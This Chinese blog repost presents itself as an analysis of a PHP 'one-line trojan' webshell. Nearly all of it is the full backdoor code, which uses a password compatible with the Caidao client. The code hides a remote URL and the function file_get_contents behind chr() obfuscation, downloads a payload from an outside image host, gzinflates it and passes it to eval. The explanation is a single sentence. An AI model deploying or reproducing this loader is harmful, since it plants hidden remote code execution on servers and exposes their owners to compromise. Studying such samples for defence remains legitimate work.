码迷,mamicode.com
首页 > 其他好文 > 详细

窥探一句话木马后门的背后

时间:2017-06-10 22:43:32      阅读:588      评论:0      收藏:0      [点我收藏+]

标签:分析   ssi   支持   art   执行   一句话木马   功能   lock   菜刀   

分析的木马后门:

 <?php
$password=‘vae‘;//登录密码(支持菜刀)
//----------功能程序------------------//
$c="chr";
session_start();
if(empty($_SESSION[‘PhpCode‘])){
$url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47);
$url.=$c(47).$c(105).$c(46).$c(110).$c(105).$c(117);
$url.=$c(112).$c(105).$c(99).$c(46).$c(99).$c(111);
$url.=$c(109).$c(47).$c(105).$c(109).$c(97).$c(103);
$url.=$c(101).$c(115).$c(47).$c(50).$c(48).$c(49).$c(55);
$url.=$c(47).$c(48).$c(53).$c(47).$c(50).$c(49).$c(47);
$url.=$c(118).$c(49).$c(81).$c(82).$c(49).$c(77).$c(46).$c(103).$c(105).$c(102);
$get=chr(102).chr(105).chr(108).chr(101).chr(95);
$get.=chr(103).chr(101).chr(116).chr(95).chr(99);
$get.=chr(111).chr(110).chr(116).chr(101).chr(110);
$get.=chr(116).chr(115);
$_SESSION[‘PhpCode‘]=$get($url);}
$un=$c(103).$c(122).$c(105).$c(110);
$un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode(‘MTAx‘));
@eval($un($_SESSION[‘PhpCode‘]));
?> 

判断如果session[‘Phpcode‘]为空的话执行七到十八行的代码。

 

窥探一句话木马后门的背后

标签:分析   ssi   支持   art   执行   一句话木马   功能   lock   菜刀   

原文地址:http://www.cnblogs.com/xishaonian/p/6980031.html

(3)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!